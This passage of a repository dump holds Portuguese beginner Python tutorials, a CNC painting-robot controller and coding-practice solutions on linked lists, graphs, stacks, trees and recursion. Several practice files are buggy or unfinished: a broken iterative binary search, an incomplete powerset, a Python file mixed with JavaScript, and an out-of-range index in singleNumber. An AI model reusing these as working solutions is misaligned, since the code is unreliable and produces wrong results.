"length_bytes": 265,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 11,
"path": "/semana-4/modules_5.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nUso da função dir()\n\nExiste uma função embutida no Python para listar todos os nomes de função(ou nomes de variáveis) em um módulo.\n'''\n# Lista todos os nomes definidos pertencentes ao módulo da plataforma:\n\nimport platform\n\nx = dir(platform)\nprint(x)\n"
},
{
"alpha_fraction": 0.6260781288146973,
"alphanum_fraction": 0.6585489511489868,
"avg_line_length": 14.193798065185547,
"blob_id": "52601dc4532aed67104e6a847bc82c923dbe24c1",
"content_id": "d1cc6449739ac844594ee7fba8571fed3f0e177c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2010,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 129,
"path": "/semana-1/numbers.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nPython Numbers (Números em Ptyhon)\n\nExistem três tipos numéricos em Ptyhon:\n'''\n # int\n # float\n # complex\n\n'''\nVariáveis de tipos numéricos são criadas quando você atribui um valor para elas:\n'''\n\nx = 1 # int\ny = 2.8 # float\nz = 1j # complex\n\n'''\nPara verificar o tipo de qualquer objeto em Python, use a função type():'''\n\nprint (type(x))\nprint (type(y))\nprint (type(z))\n\n'''\nInt\n\nInt, ou inteiro, é um número inteiro, positivo ou negativo, sem decimais, de comprimento ilimitado.\n'''\n# Integers:\n\nx = 1\ny = 35656222554887711\nz = -325522\n\nprint (type(x))\nprint (type(y))\nprint (type(z))\n\n'''\nFloat\n\nFloat ou \"número de ponto flutuante\" é um número, positivo ou negativo, contendo uma ou mais casas decimais.\n'''\n\n# Floats:\n\nx = 1.10\ny = 1.0\nz = 35.59\n\nprint (type(x))\nprint (type(y))\nprint (type(z))\n\n'''\nFloat também pode ser um número científico com um \"e\" para indicar a potência 10.\n'''\n\n# Floats:\n\nx = 35e3\ny = 12E4\nZ = -87.7e100\n\nprint (type(x))\nprint (type(y))\nprint (type(z))\n\n'''\nComplex\n\nNúmeros complexos são escritos com um \"j\" como a parte imaginária:\n'''\n\n# Complex\n\nx = 3+5j\ny = 5j\nz = -5j\n\nprint (type(x))\nprint (type(y))\nprint (type(z))\n\n'''\nType Conversion (Conversão de Tipo)\n\nVoçê pode converter de um tipo para outro com os métodos int(), float() e complex():\n'''\n\n# Converter de um tipo para outro:\n\nx = 1 # int\ny = 2.8 # float\nz = 1j # complex\n\n# converte de int para float:\n\na = float (x)\n\n# converte de float para int:\n\nb = int (y)\n\n# converte de int para complex:\n\nc = complex (x)\n\nprint (a)\nprint (b)\nprint (c)\n\nprint (type(a))\nprint (type(b))\nprint (type(c))\n\n'''\nRandom Number (Número Randômico)\n\nO Python não possui uma função random() para criar um núemro aleatório, mas o Python possui um módulo interno chamado\nramdom que pode ser usado para criar números aleatórios:\n'''\n\n# Importe o módulo aleatório e exiba um número aleatório entre 1 e 9:\n\nimport random\n\nprint (random.randrange(1, 10))\n\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6262626051902771,
"alphanum_fraction": 0.6454545259475708,
"avg_line_length": 16.678571701049805,
"blob_id": "b8563368e1f484db2cfb9a2a70332c97bc82cbf6",
"content_id": "59b0148bd5067dd2fc1dd3e072a7cd1ee71689ca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1017,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 56,
"path": "/semana-3/while_loops.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nPython Loops\n\nO Python possui dois comandos nativos de loop:\n\n - While loops\n - For loops\n'''\n# Com o while loop, podemos executar um conjunto de instruções desde que uma condição seja verdadeira:\n\ni = 1\nwhile i <= 10:\n print(i)\n i += 1\n\n'''\nThe break Statement (Declaração break)\n\nCom o break, podemos parar o loop mesmo se a condição while for verdadeira.\n'''\n# Exemplo:\n\ni = 1\nwhile i <= 10:\n print(i)\n if i == 5:\n break\n i += 1\n\n'''\nThe continue Statement (Declaração continue)\n\nCom a instrução continue, podemos parar a interação atual e continuar com a próxima.\n'''\n# Exemplo:\n\ni = 0\nwhile i < 7:\n i += 1\n if i == 3:\n continue\n print(i)\n\n'''\n The else Statement (Declaração else)\n\n Com a declaração else, podemos executar um bloco de código uma vez, quando a condição não for mais verdadeira.\n'''\n# Imprimi a mensagem quando a condição for false:\n\ni = 1\nwhile i <= 10:\n print(i)\n i += 1\nelse:\n print('i não é menor do que 10')\n"
},
{
"alpha_fraction": 0.6833473443984985,
"alphanum_fraction": 0.6955424547195435,
"avg_line_length": 18.02400016784668,
"blob_id": "b4c9b5b5c01c7846936e4d1408627e64c6dbaa0f",
"content_id": "210a8e5a0eb5daaf00e0f247e5c5400ec4236b1b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2431,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 125,
"path": "/semana-2/booleans.py",
"repo_name": "rogerio5ouza/python-beginner",
"src_encoding": "UTF-8",
"text": "'''\nPython Booleans\n\nBooleans representa um de dois valores: True ou False.\n\nValores Booleanos\n\nQuando você compara dois valores, a expressão é avaliada e o Python retorna a resposta Booleana.\n'''\n# Exemplo:\n\nprint(10 > 9)\nprint(10 == 9)\nprint(10 < 9)\n\n'''\nQuando executmaos uma condição em uma instrução IF, o Python retorna True ou False.\n'''\n# Exemplo:\n\na = 200\nb = 33\n\nif b > a:\n print('b é maior do que a')\nelse:\n print('b não é maior do que a')\n\n\n'''\nEvaluate Values and Variables (Avaliar valores e variáveis)\n\nA função bool() permite avaliar qualquer valor e retornar True ou False.\n'''\n# Exemplo:\n# Avalia uma string e um número:\n\nprint(bool('Hello'))\nprint(bool(15))\n\n# Avalia duas variáveis:\n\nx = 'Hello'\ny = 15\n\nprint(bool(x))\nprint(bool(y))\n\n'''\nA maioria dos valores é True\n\nQuase todo valor é avaliado como True se tiver algum tipo de conteúdo.\nQualquer cadeia é True, exceto cadeias vazias.\nQualquer número é True, exceto 0.\nQualquer lista, tupla, conjunto e dicionário são True, exceto os vazios.\n'''\n# Exemplo:\nbool('abc')\nbool(123)\nbool(['apple', 'cherry', 'banana'])\n\n'''\nAlguns valores são falsos\n\nDe fato, não há muitos valores avaliados como Falso, exceto valores vazios, como (), [], {}, \"\", o número 0 e o valor Nenhum.\nE claro, o valor Flase avalia como False.\n'''\n# Exemplo:\n\nbool(False)\nbool(None)\nbool(0)\nbool(\"\")\nbool(())\nbool([])\nbool({})\n\n'''\nMais um valor, ou objeto, nesse caso, é avaliado como False, ou seja, se você tiver um objeto que é feito de uma classe com \numa função __len__ que retorna 0 ou False.\n'''\n# Exemplo:\n\n\nclass myclass():\n def __len__(self):\n return 0\n\n\nmyobj = myclass()\nprint(bool(myobj))\n\n# Funções podem retornar um valor Booleano\n# Você pode criar funções que retornem um valor Booleano\n# Exemplo:\n\n\n# def myFunction():\n# return True\n\n\nprint(myFunction())\n\n# Você pode executar o código com base na resposta Booleana de uma fumção.\n# Exemplo: (Imprima 'YES!' se a função retornar True, ou então imprima 'NO!'):\n\n\ndef myFunction():\n return True\n\n\nif myFunction():\n print('YES!')\nelse:\n print('NO!')\n\n'''\nO Python também possui muitas funções internas que retornam um valor Booleano, como a função isintance(),\nque pode ser usada para determinar se um objeto é de um determinado tipo de dados:\n'''\n# Exemplo\n# Verifica se um objeto é um número inteiro ou não:\n\nx = 200\nprint(isinstance(x, int))\n"
}
] | 39 |
flyingfuq/BotRoss
|
https://github.com/flyingfuq/BotRoss
|
6dce11c538ba11a6f0fe9290342d6197d706230f
|
36c9ce2cc943784d8d8336e39269b80a2c16f83b
|
6826ffe4679caa7cb9459102197d970acc4efef6
|
refs/heads/master
| 2020-03-26T17:28:37.993251 | 2018-08-17T18:25:24 | 2018-08-17T18:25:24 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.569343090057373,
"alphanum_fraction": 0.5826535224914551,
"avg_line_length": 39.13793182373047,
"blob_id": "6a323f9a9e990b025c385b416b7de6cd0c8c67bc",
"content_id": "5be1d0da8b2bbb17cf5302e1b920bfbdde1d6fe6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2329,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 58,
"path": "/bot_ross/brush_cnc.py",
"repo_name": "flyingfuq/BotRoss",
"src_encoding": "UTF-8",
"text": "import defines\nfrom stepper_motor import StepperMotor, StepperMotorDirection # noqa: 402\nfrom switch import Switch\n\n\nclass BrushCNC():\n def __init__(self):\n self._stepper_x = StepperMotor(\n defines.STEPPER_X_1,\n defines.STEPPER_X_2,\n defines.STEPPER_X_3,\n defines.STEPPER_X_4\n )\n self._stepper_y_left = StepperMotor(\n defines.STEPPER_Y_LEFT_1,\n defines.STEPPER_Y_LEFT_2,\n defines.STEPPER_Y_LEFT_3,\n defines.STEPPER_Y_LEFT_4\n )\n self._stepper_y_right = StepperMotor(\n defines.STEPPER_Y_RIGHT_1,\n defines.STEPPER_Y_RIGHT_2,\n defines.STEPPER_Y_RIGHT_3,\n defines.STEPPER_Y_RIGHT_4\n )\n self._stepper_z = StepperMotor(\n defines.STEPPER_Z_1,\n defines.STEPPER_Z_2,\n defines.STEPPER_Z_3,\n defines.STEPPER_Z_4\n )\n self._switch_reset_x = Switch(defines.SWITCH_RESET_X)\n self._switch_reset_y = Switch(defines.SWITCH_RESET_Y)\n self._switch_reset_z = Switch(defines.SWITCH_RESET_Z)\n\n def zeroing(self):\n \"\"\"\n Uses the limit switches for each of the motors to bring them all back to a zeroed position\n \"\"\"\n x_zeroed, y_zeroed, z_zeroed = False, False, False\n self._stepper_x.set_stepper(defines.STEPPER_X_MAX_HZ / 2, -defines.BOARD_X_LENGTH)\n self._stepper_y_left.set_stepper(defines.STEPPER_Y_MAX_HZ / 2, -defines.BOARD_Y_LENGTH)\n self._stepper_y_right.set_stepper(defines.STEPPER_Y_MAX_HZ / 2, -defines.BOARD_Y_LENGTH)\n self._stepper_z.set_stepper(defines.STEPPER_Z_MAX_HZ / 2, -defines.BOARD_Z_LENGTH)\n\n while x_zeroed is False or y_zeroed is False or z_zeroed is False:\n if x_zeroed is False and self._switch_reset_x.get_state() is True:\n self._stepper_x.set_stepper(0, 0)\n x_zeroed = True\n\n if y_zeroed is False and self._switch_reset_y.get_state() is True:\n self._stepper_y_left.set_stepper(0, 0)\n self._stepper_y_right.set_stepper(0, 0)\n y_zeroed = True\n\n if z_zeroed is False and self._switch_reset_z.get_state() is True:\n self._stepper_z.set_stepper(0, 0)\n z_zeroed = True\n\n"
},
{
"alpha_fraction": 0.6177945137023926,
"alphanum_fraction": 0.6729323267936707,
"avg_line_length": 18.950000762939453,
"blob_id": "ad97dd302216fdd557687130cc4d6ba9b660da91",
"content_id": "abd0fe0b25f45d665908bc60457eee381e014355",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 798,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 40,
"path": "/bot_ross/defines.py",
"repo_name": "flyingfuq/BotRoss",
"src_encoding": "UTF-8",
"text": "# General constants\nBOARD_X_LENGTH = -1\nBOARD_Y_LENGTH = -1\nBOARD_Z_LENGTH = -1\n\n# Stepper motor out-channel declarations\nSTEPPER_X_1 = -1\nSTEPPER_X_2 = -1\nSTEPPER_X_3 = -1\nSTEPPER_X_4 = -1\n\nSTEPPER_Y_LEFT_1 = -1\nSTEPPER_Y_LEFT_2 = -1\nSTEPPER_Y_LEFT_3 = -1\nSTEPPER_Y_LEFT_4 = -1\n\nSTEPPER_Y_RIGHT_1 = -1\nSTEPPER_Y_RIGHT_2 = -1\nSTEPPER_Y_RIGHT_3 = -1\nSTEPPER_Y_RIGHT_4 = -1\n\nSTEPPER_Z_1 = -1\nSTEPPER_Z_2 = -1\nSTEPPER_Z_3 = -1\nSTEPPER_Z_4 = -1\n\n# Stepper motor constants\nSTEPPER_X_MAX_HZ = -1.0\nSTEPPER_Y_MAX_HZ = -1.0 # Two y motors conditions are doubled\nSTEPPER_Z_MAX_HZ = -1.0 # The rest of these bad boys, PRESUMABLY have different torques\n\n# Servo motor address declarations\n\n\n# ...eventually\n\n# Switch in-channel declarations\nSWITCH_RESET_X = -1\nSWITCH_RESET_Y = -1\nSWITCH_RESET_Z = -1\n"
}
] | 2 |
bnitin92/coding_practice
|
https://github.com/bnitin92/coding_practice
|
66f2f5997ed1da032bb57d29f992ffc1d9928f38
|
59079552bd3231d10a2c92011ae2602fa1221fcd
|
5583826bf26e6923242242253d4a39644edcc1f0
|
refs/heads/master
| 2023-01-14T07:36:28.859285 | 2020-11-23T02:07:14 | 2020-11-23T02:07:14 | 296,207,923 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.47049808502197266,
"alphanum_fraction": 0.5241379141807556,
"avg_line_length": 16.648649215698242,
"blob_id": "718bdb7c238890e0c38eac49689406a54a13d4f8",
"content_id": "84d5902370fca636d5a0ae236b02c19594c2031e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1363,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 74,
"path": "/Interview1_1/11_11 Recursion.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "\"\"\"\n/*
Givn a rectangular path in the form of a binary matix, find
the length of the\nlongest possible route form source to
destination, by moving to only nonzero adjacent positions, i.e.
\nroute can be formed from positions having their value as 1.
Note, there should not be any cycles in the output path.
*/\n\"\"\"\n\nimport numpy\n\nM = [[1, 0, 0, 1, 0],\n [1, 1, 0, 0, 0],\n [0, 1, 1, 1, 1],\n [1, 1, 0, 1, 0],\n [1, 1, 1, 1, 0]]\n\n#const start = [0, 0];
const target = [2,4];
\n\n\"\"\"\nprobable solution\n\nalways check the adjacent cells \nif i find 1 replace that cell wiht X in the resulting matrix\nwhile finding if i get x \n\"\"\"\n\ndef rpath(start, target):\n result = [[0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0]]\n\n x = start[0]\n y = start[1]\n\n left = (x-1, y)\n right = (x+1, y)\n up = (x, y+1)\n down = (x, y-1)\n\n if M[]\n dfs()\n\nprint(rpath(0,0))\n\nfunction canGoHere( i, j) {
// out of bounds
if (i < 0 || i > 4) {
return false;
// out of bounds
} else if (j < 0 || j > 4) {
return false;
// already been here
} else if (V[i][j] > 0 ) {
return false;
// no path here in the matrix
} else if (M[i][j] === 0) {
return false;
}
return true;
}"
},
{
"alpha_fraction": 0.558282196521759,
"alphanum_fraction": 0.5828220844268799,
"avg_line_length": 20.766666412353516,
"blob_id": "edc3ae0f9ee6c1108a300008663a85c2e0770e7d",
"content_id": "8e7b5072e9ac044befa82847553e89935add4ded",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 652,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 30,
"path": "/Linked_List/LC/21. Merge Two Sorted Lists.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# Merging 2 sorted linked lists\n\n\"\"\"\nMerge two sorted linked lists and return it as a new sorted list.\n The new list should be made by splicing together the nodes of the first two lists.\n\n\"\"\"\n\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\ndef mergeTwoLists(l1, l2):\n # create a dummy node and link the nodes to that\n\n dummy = curr = ListNode()\n\n while l1 and l2:\n if l1.val < l2.val:\n curr.next = l1\n l1 = l1.next\n else:\n curr.next = l2\n l2 = l2.next\n curr = curr.next\n\n curr.next = l1 or l2\n\n return dummy.next"
},
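Note on the merge entry above: a quick usage check, assuming the ListNode class and mergeTwoLists defined in that file; the `build` helper and the sample values are illustrative, not from the original.

def build(values):
    # build a linked list from a Python list (testing helper only)
    dummy = curr = ListNode()
    for v in values:
        curr.next = ListNode(v)
        curr = curr.next
    return dummy.next

merged = mergeTwoLists(build([1, 2, 4]), build([1, 3, 4]))
out = []
while merged:
    out.append(merged.val)
    merged = merged.next
print(out)  # [1, 1, 2, 3, 4, 4]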
{
"alpha_fraction": 0.622296154499054,
"alphanum_fraction": 0.6439267992973328,
"avg_line_length": 22.115385055541992,
"blob_id": "47e50db1ea58edafd39814b482509d9b49f62fba",
"content_id": "52cb301878044ac44707c3bcb6117639e3d40c7e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 601,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 26,
"path": "/Graphs/LC/1557. Minimum Number of Vertices to Reach All Nodes.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# Find the minimum number of vertices to reach all nodes\n\n\"\"\"\n\ninshort we need to find edges without any incomming nodes\n\n\"\"\"\n\n# gives time exceed\n#def findSmallestSetOfVertices(self, n: int, edges: List[List[int]]) -> List[int]:\n# def findSmallestSetOfVertices(n, edges):\n#\n# vertices = [i for i in range(n)]\n#\n# for i in edges:\n# if i[1] in vertices:\n# vertices.remove(i[1])\n#\n# return vertices\n\n\ndef findSmallestSetOfVertices(n, edges):\n return list(set(range(n)) - set(j for i, j in edges))\n\n\nprint(findSmallestSetOfVertices(6, [[0,1],[0,2],[2,5],[3,4],[4,2]]))\n"
},
{
"alpha_fraction": 0.5351034998893738,
"alphanum_fraction": 0.5486048460006714,
"avg_line_length": 23.41758155822754,
"blob_id": "0e824ed9d7c60235091bf9cd45935ce7656aa543",
"content_id": "6491dcd6dba862810a1c8143511d16b2c87b1ee5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2222,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 91,
"path": "/Stacks and Queues/EPI/stack_maxAPI.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "\n# Stack with a max API\n\n\"\"\"\nbrutforce\nCreate a stack using OOP and another variable to store max\n\n\"\"\"\n\"\"\"\n# Time complexity is O(n) \nclass Stack:\n def __init__(self):\n self.stack = []\n self.maximum = 0 #float(\"-inf\")\n\n def push(self, element):\n self.stack.append(element)\n self.maximum = max(self.maximum, element)\n\n def isEmpty(self):\n return len(self.stack) == 0\n\n def pop(self):\n self.stack.pop()\n self.maximum = max(self.stack)\n\n def maxi(self):\n return self.maximum\n\n\"\"\"\n\n# Another method with extra stack storing object of (max, count)\nclass Stack:\n class MaxWithCount:\n def __init__(self, max, count):\n self.max, self.count = max, count\n\n def __init__(self):\n self._elements = []\n self._cached_max_with_counts = []\n\n def empty(self):\n return len(self._elements) == 0\n\n def max(self):\n if self.empty():\n raise IndexError(\"empty stack\")\n return self._cached_max_with_counts[-1].max\n\n def pop(self):\n if self.empty():\n raise IndexError(\"empty stack\")\n pop_element = self._elements.pop()\n current_max = self._cached_max_with_counts[-1].max\n if current_max == pop_element:\n if self._cached_max_with_counts[-1].count > 1:\n self._cached_max_with_counts[-1].count -= 1\n else:\n self._cached_max_with_counts.pop()\n\n return pop_element\n\n def push(self, x):\n if self.empty():\n self._elements.append(x)\n self._cached_max_with_counts.append(self.MaxWithCount(x, 1))\n else:\n self._elements.append(x)\n if x == self.max():\n self._cached_max_with_counts[-1].count += 1\n if x > self.max():\n self._cached_max_with_counts.append(self.MaxWithCount(x, 1))\n\n def print_stacks(self):\n print(self._elements)\n print(self._cached_max_with_counts)\n\ndef main():\n s1 = Stack()\n #print(s1.max())\n s1.push(1)\n s1.push(5)\n s1.push(4)\n s1.push(7)\n print(s1.max())\n s1.pop()\n print(s1.max())\n s1.push(6)\n print(s1.max())\n s1.print_stacks()\n\nmain()"
},
{
"alpha_fraction": 0.3957446813583374,
"alphanum_fraction": 0.47659575939178467,
"avg_line_length": 13.242424011230469,
"blob_id": "1d77c35bd195ef4ea36f24424dc44247122b456d",
"content_id": "526301559010edb92d92eca4e21c96ecf2750cab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 470,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 33,
"path": "/Interview1_1/10_28 Recursion.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# Power set\n\n\"\"\"\ninput = set (1,2,3) or array --- integers\n\noutput = [[1], [2], [3], [1,2], [2,3], [1,3], [1,2,3]]\n\n\"\"\"\n\n\"\"\"\nsolution:\n\npowerset(array)\n\nreturn = [[]]\n\n1 - res.append([1])\n2 - res.append([1],[2],[1,2])\n3 - res.append([1], [2], [3], [1,2], [2,3], [1,3],[1,2,3]) \nn - append\n\"\"\"\n\ndef powerset(input):\n total = len(input)\n size = total\n res = []\n\n res.append(input)\n size -= 1\n powerset(input[1:])\n\n if len(input) == 0:\n return\n"
},
{
"alpha_fraction": 0.5727553963661194,
"alphanum_fraction": 0.5897833108901978,
"avg_line_length": 22.962963104248047,
"blob_id": "4e86f3d43071a53ded20e2dda036d016e90d4b48",
"content_id": "242ea8f676d38ac6fa451f8245aadcf5879ffb69",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 646,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 27,
"path": "/Recursion_DP/BbB/Tower of Hanoi.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# tower of hanoi\n\n\"\"\"\nAbdual bari explaination\n\nif n > 0\n\nmove all n - 1 disks from A to B using C\nmove the nth disk from A to C\nmove all n - 1 disks from B to C using A\n\nfrom to and aux rods will change accordingly in sub problems\n\"\"\"\n\n# its 2 ^ n cha=eck how\n\ndef towerofHanoi(n, from_rod, to_rod, aux_rod):\n # if n == 1:\n # print(\"Move Disk 1 from \"+ from_rod + \" to \" + to_rod)\n # return\n\n if n > 0:\n towerofHanoi(n-1, from_rod, aux_rod, to_rod)\n print(\"Move Disk \" + str(n) + \" from \" + from_rod + \" to \" + to_rod)\n towerofHanoi(n-1, aux_rod, to_rod, from_rod)\n\nprint(towerofHanoi(10, \"A\", \"C\", \"B\"))"
},
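Note on the Tower of Hanoi entry above: why the move count is 2**n - 1. Each call makes two recursive transfers of n - 1 disks plus one direct move, so T(n) = 2*T(n-1) + 1 with T(0) = 0, which solves to 2**n - 1. A small counting sketch (the function name is illustrative, not from the original file):

def count_moves(n):
    if n == 0:
        return 0
    return 2 * count_moves(n - 1) + 1  # two sub-transfers plus one direct move

for n in (1, 2, 3, 10):
    assert count_moves(n) == 2 ** n - 1
print(count_moves(10))  # 1023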
{
"alpha_fraction": 0.5272353291511536,
"alphanum_fraction": 0.5632065534591675,
"avg_line_length": 15.233333587646484,
"blob_id": "41585c1ff2376356f70ba3995810795b6cac4d8b",
"content_id": "0e08f49608daec6e0acb9781b96bacdd453d6f92",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 973,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 60,
"path": "/Interview1_1/9_23_binarysearch.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# binary search without recursion\n\n\"\"\"\nI/P = sorted list and intergers\n\n-inf to inp\n\no/p - index of the first reference\nNone\n\"\"\"\n\n# from bisect import bisect_left\n\n\"\"\"\nIterative step:\n\nvariables storing indices - first last middle\n\nwhile middle != 1:\n1) find the middle element - len(list) // 2 \nif equal then I well return the index\nif value is less then middle element\n#first = first\nlast = middle\nelseif:\nfirst = middle\n#last = last\n\nreturn None\n\n\"\"\"\n\ndef binary_search(l, val):\n first = 0 # 0\n last = len(l) - 1 # 3\n middle = len(l) // 2 # 1\n\n while middle > 0:\n if l[middle] == val:\n return middle\n elif l[middle] < val:\n first = middle\n middle = (last - first) // 2 + first\n else:\n last = middle\n middle = (last - first) // 2\n\n return None\n\n# Test cases\n\"\"\"\nl1 = [-2, 3, 4, 6, 8, 10] val= 3\n\n\n\n\"\"\"\n\na = binary_search([-10, -2, 3, 4, 6, 8, 10, 19, 21], -2)\n\nprint(a)"
},
{
"alpha_fraction": 0.5153061151504517,
"alphanum_fraction": 0.5408163070678711,
"avg_line_length": 20.83333396911621,
"blob_id": "cb6d8a86fde2258bc9debb4047318747de12eb14",
"content_id": "61c505012b839b9f18aba7924ec06020cba9d370",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 392,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 18,
"path": "/Daily_InterviewPro/1018_Find the non-duplicate number.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "\"\"\"\nGiven a list of numbers, where every number shows up twice except for one number, find that one number.\n\n\"\"\"\n\ndef singleNumber(nums):\n # Fill this in.\n nums.sort()\n\n for i in range(0, len(nums), 2):\n if i == len(nums):\n return nums[i]\n else:\n if nums[i] != nums[i+1]:\n return nums[i]\n\n\nprint(singleNumber([4, 3, 2, 4, 1, 3, 2]))"
},
{
"alpha_fraction": 0.5891402959823608,
"alphanum_fraction": 0.5972850918769836,
"avg_line_length": 21.5510196685791,
"blob_id": "f94db23dd334dfdd171d923fa36e49e7c74c818f",
"content_id": "494d144c2d8a51b310055d286ef40047a9609638",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1105,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 49,
"path": "/Trees/Edu/8.2 BT search (BFS).py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# Binary Tree Level Order Traversal\n\n\"\"\"\nGiven a binary tree, populate an array to represent its level-by-level traversal.\nYou should populate the values of all nodes of each level from left to right in separate sub-arrays.\n\n\"\"\"\n\n# class Tree Node\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\ndef BFS(root):\n result = []\n\n if root == None:\n return None\n\n queue = []\n queue.append(root)\n\n while queue:\n levelsize = len(queue)\n currentlevel = []\n\n for _ in range(levelsize):\n curr = queue.pop(0)\n currentlevel.append(curr.val)\n if curr.left:\n queue.append(curr.left)\n if curr.right:\n queue.append(curr.right)\n\n result.append(currentlevel)\n\n return result\n\ndef main():\n root = TreeNode(12)\n root.left = TreeNode(7)\n root.right = TreeNode(1)\n root.left.left = TreeNode(9)\n root.right.left = TreeNode(10)\n root.right.right = TreeNode(5)\n print(\"Level order traversal: \", str(BFS(root)))\n\nmain()\n"
},
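Note on the BFS entry above: list.pop(0) shifts every remaining element, so each dequeue costs O(n). collections.deque gives O(1) popleft; a sketch of the same traversal under that swap (assumes the TreeNode class from the file above; the function name is illustrative):

from collections import deque

def bfs_deque(root):
    if root is None:
        return None
    result, queue = [], deque([root])
    while queue:
        level = []
        for _ in range(len(queue)):
            node = queue.popleft()  # O(1), unlike list.pop(0)
            level.append(node.val)
            if node.left:
                queue.append(node.left)
            if node.right:
                queue.append(node.right)
        result.append(level)
    return result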
{
"alpha_fraction": 0.5471698045730591,
"alphanum_fraction": 0.650943398475647,
"avg_line_length": 14.285714149475098,
"blob_id": "239fd5d7cacdf27266adfd6451ec747df0d0d7e4",
"content_id": "a9286bdd058d96ed581dea466f03cae064bf365e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 106,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 7,
"path": "/testing.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# print(set(range(10)))\n\n#print(\"bbccdddhjkkkmmnpqqssttuuuwwxxxyyy\"[33])\n\na = [1,2,3,4,5,6]\n\nprint(a[:-1])"
},
{
"alpha_fraction": 0.6139896512031555,
"alphanum_fraction": 0.6243523359298706,
"avg_line_length": 15.782608985900879,
"blob_id": "07acb0a623da2c8e0645de2e95e59750e95aac09",
"content_id": "929611c2a3c89fb6dbb030353cb739a18a30424c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 386,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 23,
"path": "/Recursion_DP/BbB/Find all substrings of a string.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
"text": "# find all substrings\n\n# Concept (pick or dont pick)\nres = []\n\ndef substring(s):\n findSubstring(s, \"\")\n\n return res\n\n# see notebook for the diagram\n\ndef findSubstring(s, ans):\n\n if len(s) == 0:\n res.append(ans)\n return\n\n findSubstring(s[1:], ans + s[0]) #picking firs element\n\n findSubstring(s[1:], ans) # not picking first element\n\nprint(substring(\"abc\"))\n"
},
{
"alpha_fraction": 0.47980502247810364,
"alphanum_fraction": 0.4993036091327667,
"avg_line_length": 18.6849308013916,
"blob_id": "dc19208a3b7aa093a1588f3abb635f7c67c427b2",
"content_id": "1cf6fe1bd966c6cc24370a8f59e75c4a7fe41820",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1436,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 73,
"path": "/Interview1_1/9_30.py",
"repo_name": "bnitin92/coding_practice",
"src_encoding": "UTF-8",
